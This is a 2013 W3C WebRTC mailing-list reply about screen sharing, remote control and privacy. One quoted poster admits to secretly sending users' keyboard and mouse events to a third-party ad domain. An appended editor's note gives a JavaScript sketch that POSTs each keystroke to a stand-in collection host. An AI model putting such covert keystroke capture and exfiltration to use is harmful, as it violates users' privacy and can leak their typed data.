W3C home > Mailing lists > Public > public-webrtc@w3.org > November 2013

Re: Screen sharing and application control

From: <piranna@gmail.com>
Date: Tue, 26 Nov 2013 00:09:29 +0100
Message-ID: <CAKfGGh3_Fa+L0XV3ysdD2bnHkmniRVkQd=YK5qpadn08cLVnJQ@mail.gmail.com>
To: Martin Thomson <martin.thomson@gmail.com>
Cc: public-webrtc <public-webrtc@w3.org>

Thanks for the clarification :-)

So, the key point here is that it's the local app that explicitly fetches the
event and sends it remotely, instead of it being fetched automatically, for
example via WebRTC and a "requestRemoteKeyboard", isn't it? Currently there are
tricks that make it possible to take snapshots of the full screen and send them
remotely, so what's the difference with doing it automatically with
getUserMedia()? The fact that it's a sequence of frames instead of a stream?

I agree there's a privacy concern here that needs to be addressed, but sweeping
the dust under the carpet of a plugin is not the solution.

Sent from my Samsung Galaxy Note II
On 25/11/2013 23:36, "Martin Thomson" <martin.thomson@gmail.com> wrote:

> On 25 November 2013 14:34, piranna@gmail.com <piranna@gmail.com> wrote:
> > You can already capture and generate both keyboard and mouse events since
> > almost the beginning of the web and Javascript, and in fact I did it for
> > an online ad marketplace where I worked, where I sent the data to a third
> > party domain without the user being aware of anything. Or are you talking
> > about something different that I've missed?
> Those events are only captured and generated within the context of the
> window that the application already controls.  Remote control of the
> sort I was referring to goes outside of that context.
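
[Editor's note: the in-window capture piranna describes in the quoted message
can be sketched roughly as follows. The collection endpoint and the serialized
fields are hypothetical examples, and, as Martin notes, such a listener only
sees events delivered to the page's own window, not keystrokes in other
applications.]

```javascript
// Hedged sketch: forwarding in-window keyboard events to a third party.
// The endpoint URL and the chosen fields are hypothetical examples.

// Reduce a DOM KeyboardEvent to the fields a remote observer might want.
function serializeKeyEvent(e) {
  return {
    type: e.type,
    key: e.key,
    ctrlKey: !!e.ctrlKey,
    altKey: !!e.altKey
  };
}

// In a browser, this listener only ever fires for events targeted at
// this window; it cannot observe input in other applications:
//
//   document.addEventListener('keydown', function (e) {
//     var xhr = new XMLHttpRequest();
//     xhr.open('POST', 'https://third-party.example/collect'); // hypothetical
//     xhr.send(JSON.stringify(serializeKeyEvent(e)));
//   });
```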
Received on Monday, 25 November 2013 23:09:56 UTC
